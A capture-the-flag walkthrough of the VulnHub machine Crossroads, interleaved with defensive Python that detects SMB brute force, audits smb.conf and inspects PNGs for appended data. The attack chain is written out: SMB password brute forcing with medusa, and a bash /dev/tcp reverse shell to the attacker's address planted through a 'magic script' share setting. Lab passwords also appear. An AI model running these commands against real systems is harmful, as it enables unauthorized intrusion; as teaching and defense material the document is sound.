Yay! Here's another week to capture the flag. Today's vulnerable machine is Crossroads from VulnHub (our most usual source). Let's dive into the action right away.
- We get the target machine's address using the netdiscover command.
- We scan the IP address with nmap to find open ports which we can attack.
The scan shows that port 80/http, 139/smb and 445/smb are open. We also see a couple more things which may be useful to us later.
- Let's navigate to the http port to see if we get anything useful. We actually did not find any useful information, so we proceed to do some directory busting to find available paths using dirbuster.
From the result, we get two interesting paths, /robots.txt and /note.txt. Now let's see if we can get some hints from these paths.
- Accessing the paths, /robots.txt didn't help us with any information, but /note.txt gave some sort of clue.
We will come back to this clue later.
- So far, we have found something really helpful. Since we also have SMB ports open, let's do some enumeration using enum4linux -
enum4linux -a 10.0.2.12
We found out that there's a user named albert on the server as well as the following shares - IPC$, smbshare and print$. Also, a guest account, nobody, was discovered.
Some other findings were uncovered as well.
- Now, let's try to access the SMB server using smbclient with the guest account, nobody.
We see that we are denied access to two of the shares, all except IPC$, when using no password. The guest account does not have permissions to the smbshare and print$ shares. So let's try albert's account.
Also, note that the guest account has anonymous access and is passwordless.
- Let's try connecting using albert's account.
We see that we cannot log in using albert's account as a password is required (NT_STATUS_LOGON_FAILURE), and this applies to all three shares. So, let's try brute forcing to get the password.
- Using hydra, it ran almost endlessly and I had to terminate it and use a much faster tool, Medusa, using the command
medusa -h 10.0.2.12 -u albert -P /usr/share/wordlists/rockyou.txt -M smbnt
Voilà, we now have albert's password: bradley1.
- We now access a particular share, smbshare, as user albert with password bradley1.
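From the defender's side of the exchange above (guest attempts, NT_STATUS_LOGON_FAILURE on every share, then a wordlist run against albert), the pattern worth alerting on is a burst of failed SMB logons from one client followed by a success from the same client. The following Python is an added example, not part of the original writeup and not Samba tooling; the log line format is a constructed, simplified one, so LINE_RE is an assumption to adapt to real smbd or auth-audit output.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed, simplified Samba-style authentication records (not real smbd output).
# The field layout is an assumption; adapt LINE_RE to the log format you actually collect.
SAMPLE_LOG = """\
2024/05/01 10:00:01 auth: FAILED user=albert status=NT_STATUS_WRONG_PASSWORD client=10.0.2.4
2024/05/01 10:00:03 auth: FAILED user=albert status=NT_STATUS_WRONG_PASSWORD client=10.0.2.4
2024/05/01 10:00:05 auth: FAILED user=albert status=NT_STATUS_WRONG_PASSWORD client=10.0.2.4
2024/05/01 10:00:07 auth: FAILED user=albert status=NT_STATUS_WRONG_PASSWORD client=10.0.2.4
2024/05/01 10:00:09 auth: FAILED user=albert status=NT_STATUS_WRONG_PASSWORD client=10.0.2.4
2024/05/01 10:00:11 auth: FAILED user=albert status=NT_STATUS_WRONG_PASSWORD client=10.0.2.4
2024/05/01 10:00:12 auth: OK user=albert status=NT_STATUS_OK client=10.0.2.4
2024/05/01 10:05:00 auth: FAILED user=nobody status=NT_STATUS_LOGON_FAILURE client=10.0.2.9
2024/05/01 10:30:00 auth: OK user=albert status=NT_STATUS_OK client=10.0.2.7
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}) auth: (?P<result>OK|FAILED) "
    r"user=(?P<user>\S+) status=(?P<status>\S+) client=(?P<ip>[\d.]+)$"
)


def parse_events(lines):
    """Yield one dict per parseable log line; lines that do not match are skipped."""
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        yield {
            "ts": datetime.strptime(m["ts"], "%Y/%m/%d %H:%M:%S"),
            "failed": m["result"] == "FAILED",
            "user": m["user"],
            "ip": m["ip"],
        }


def detect_bruteforce(lines, threshold=5, window_s=60):
    """Flag client IPs with at least `threshold` failed logons inside a sliding
    `window_s`-second window, and record whether a successful logon from that
    client followed the burst (the usual sign that the wordlist run found the password)."""
    recent = defaultdict(deque)  # client ip -> failure timestamps still inside the window
    alerts = {}
    for ev in parse_events(lines):
        ip = ev["ip"]
        if ev["failed"]:
            window = recent[ip]
            window.append(ev["ts"])
            # drop failures older than the window; the newest entry always stays
            while (ev["ts"] - window[0]).total_seconds() > window_s:
                window.popleft()
            if len(window) >= threshold:
                alert = alerts.setdefault(
                    ip, {"user": ev["user"], "failures": 0, "success_after": False}
                )
                alert["failures"] = len(window)
        elif ip in alerts:
            alerts[ip]["success_after"] = True
    return alerts


if __name__ == "__main__":
    for ip, info in detect_bruteforce(SAMPLE_LOG.splitlines()).items():
        print(f"{ip}: {info['failures']} failures for {info['user']}, "
              f"success afterwards: {info['success_after']}")
```

On the sample data only 10.0.2.4 trips the threshold, and its success_after flag is what distinguishes a noisy but failed run from a guessed password that should trigger a credential reset.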
We have accessed the smbshare now. So, let's look for interesting files. Nothing special was found. So, let's check other shares.
- Accessing the print$ share, we found some files, as shown in the image.
Unfortunately, these files found are just distractions. I spent a lot of time trying to get hints from them.
- After not getting anything from the files, I went to the smb.conf in the smbshare. With the help of some tools, I was able to find a configuration in the smb.conf file. In the configuration file, there's a magic script parameter. We are going to create a reverse shell script to gain remote access through it.
We also see what permissions are available to the smbshare.
- We'll create a reverse shell script and name it smbscript.sh using the command
echo '#!/bin/bash' > smbscript.sh; echo 'bash -i >& /dev/tcp/10.0.2.4/5501 0>&1' >> smbscript.sh;
on our attacking machine, and make it executable with the command chmod +x smbscript.sh.
The IP address 10.0.2.4 is the address of our attacking machine.
- As usual, we set up a netcat listener on our attacking machine
nc -nvlp 5501
listening on port 5501, and wait for the shell. Next, we upload the reverse shell script to the SMB server, to which we had already established a connection using albert's credentials, with put smbscript.sh.
We now have remote access to the target machine.
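The root cause on the service side is the smb.conf: a share that a low-privileged user can write to, combined with magic script, means any file uploaded under that name is executed by smbd. The following Python is an added example, not the machine's real configuration and not a Samba tool. It parses two constructed smb.conf fragments, the risky shape described above and a hardened version of the same share, and reports the settings that make the upload-then-execute path possible. The parameter names (magic script, guest ok, writable, read only, map to guest, restrict anonymous, valid users) are real Samba options; the share contents and the audit rules are assumptions.

```python
import configparser

# Constructed smb.conf fragments (assumptions, not the target's real file).
# WEAK_CONF has the shape the walkthrough describes: a share writable by a weak
# account, guest fallback, and a magic script that smbd runs once the file is closed.
WEAK_CONF = """\
[global]
   workgroup = WORKGROUP
   map to guest = Bad User

[smbshare]
   path = /srv/smbshare
   writable = yes
   guest ok = yes
   magic script = smbscript.sh
"""

# Same share with the dangerous knobs removed: no magic script, no guest access,
# anonymous enumeration restricted, and access limited to named users.
HARDENED_CONF = """\
[global]
   workgroup = WORKGROUP
   map to guest = Never
   restrict anonymous = 2

[smbshare]
   path = /srv/smbshare
   writable = yes
   guest ok = no
   valid users = albert
"""


def _truthy(value):
    """Samba accepts yes/true/1 (and no/false/0) for boolean parameters."""
    return value.strip().lower() in ("yes", "true", "1")


def audit_smb_conf(text):
    """Return a list of (section, finding) tuples for risky share/global settings."""
    # smb.conf values may contain '%U'-style macros, so disable interpolation.
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    findings = []

    glob = cp["global"] if cp.has_section("global") else {}
    if glob.get("map to guest", "Never").strip().lower() != "never":
        findings.append(("global", "map to guest lets unknown users fall back to the guest account"))

    for name in cp.sections():
        if name.lower() == "global":
            continue
        share = cp[name]
        if share.get("magic script"):
            findings.append((name, "magic script set: a file uploaded under this name is executed by smbd"))
        writable = _truthy(share.get("writable", share.get("writeable", "no"))) \
            or not _truthy(share.get("read only", "yes"))
        if writable and _truthy(share.get("guest ok", "no")):
            findings.append((name, "share is writable and guest ok: anonymous users can drop files"))
    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(f"== {label} ==")
        for section, msg in audit_smb_conf(conf) or [("-", "no findings")]:
            print(f"[{section}] {msg}")
```

The audit deliberately treats magic script as a finding on its own, independent of guest access: in the walkthrough the share was reached with a valid but weakly chosen password, so restricting guests alone would not have closed the path.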
- Now, let's find how to escalate to root. Heading over to the /home/albert directory, we find a user.txt file, an interesting file (script) named beroot and an image, crossroads.png.
The user.txt file just tells us that we have found the first flag.
beroot is an executable script, and we execute it with ./beroot.
We are prompted to enter a password but we do not have any. Trying an empty password gave a wrong password response. Now, going over to the image, steganography crosses our mind. We use the stegoveritas tool to extract data from the image with the command stegoveritas crossroads.png and wait for the results folder. (Before that, we used a python server to get the image over to our attacking machine to extract the data).
- After extraction, we noticed a results folder and inside the results folder was a keepers folder with the files as shown.
After printing the contents of each file, we discovered that only the first and the second-to-last files were wordlists, and they had the same contents. Then we decided to try brute forcing the beroot script using one of the two lists as the password list.
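A quick way to see why stegoveritas had something to extract, and a check an analyst can run on any suspicious image, is to walk the PNG chunk structure: a well-formed file ends at the IEND chunk, so any bytes after it are appended data, and a chunk whose CRC does not match has been tampered with. The following Python is an added example, not code from the writeup or from stegoveritas; it constructs a minimal 1x1 PNG with a labelled payload appended, then parses it back. The payload and the image itself are constructed for the example.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def build_png(appended=b""):
    """Build a minimal valid 1x1 grayscale PNG (constructed for this example) and
    optionally append extra bytes after IEND, mimicking a crude appended payload."""
    def chunk(ctype, data):
        crc = zlib.crc32(ctype + data) & 0xFFFFFFFF  # PNG CRC covers type + data
        return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)

    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)  # 1x1, 8-bit grayscale
    idat = zlib.compress(b"\x00\x00")                   # filter byte + one pixel
    return PNG_SIG + chunk(b"IHDR", ihdr) + chunk(b"IDAT", idat) + chunk(b"IEND", b"") + appended


def inspect_png(blob):
    """Walk the chunks of a PNG, verify each CRC, and report bytes after IEND.
    Returns (chunk_types, chunks_with_bad_crc, trailing_bytes)."""
    if not blob.startswith(PNG_SIG):
        raise ValueError("not a PNG file")
    pos = len(PNG_SIG)
    types, bad_crc = [], []
    while pos + 8 <= len(blob):
        length, ctype = struct.unpack(">I4s", blob[pos:pos + 8])
        data = blob[pos + 8:pos + 8 + length]
        crc_bytes = blob[pos + 8 + length:pos + 12 + length]
        if len(data) < length or len(crc_bytes) < 4:
            break  # truncated chunk: stop, everything from here is unparsed
        name = ctype.decode("ascii", "replace")
        types.append(name)
        if struct.unpack(">I", crc_bytes)[0] != (zlib.crc32(ctype + data) & 0xFFFFFFFF):
            bad_crc.append(name)
        pos += 12 + length
        if ctype == b"IEND":
            break  # the image ends here; anything after is foreign data
    return types, bad_crc, blob[pos:]


if __name__ == "__main__":
    sample = build_png(b"constructed hidden payload")
    types, bad_crc, trailing = inspect_png(sample)
    print("chunks:", types)
    print("bad CRC:", bad_crc or "none")
    print("bytes after IEND:", len(trailing), repr(trailing[:32]))
```

Real stego tools check far more than this (LSB planes, extra ancillary chunks such as tEXt, embedded archives), but trailing data after IEND and CRC mismatches are the two cheapest signals, and both are something a file-integrity or upload-scanning job can compute without any image decoding.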
- Using the bash script below, we ran it against the beroot script and found the password to be lemuel.
- Now, let's run the beroot script again and enter the password we got.
We now get a hint to find root creds using the ls command.
- Running the command, we see that there's a file named rootcreds, and printing its content shows root's password.
Now, let's escalate to root.
Pheeeew, we are now root. That was a lengthy one and lots of research was done to successfully root it.
NOTE: Recall that the path /note.txt gave some hints. Googling "three kings of blues" gives a very interesting result: "B.B. King, Albert King and Freddie King", and interestingly, "albert" happens to be the user that was exploited to escalate horizontally and then to root. That is one big benefit of reconnaissance (although we used enum4linux immediately once we found the SMB ports open).
Also, do not be confused by the differing target machine IP addresses (10.0.2.12 and 10.0.2.13); I made changes to the setup and the addresses changed as well.
That's it. Until we meet again, happy hacking.
Disclaimer: This solution is provided solely for educational and practical purposes. It is intended to demonstrate the techniques involved in solving cybersecurity challenges and to encourage ethical hacking practices. Any misuse of this information is strictly prohibited and may have legal consequences.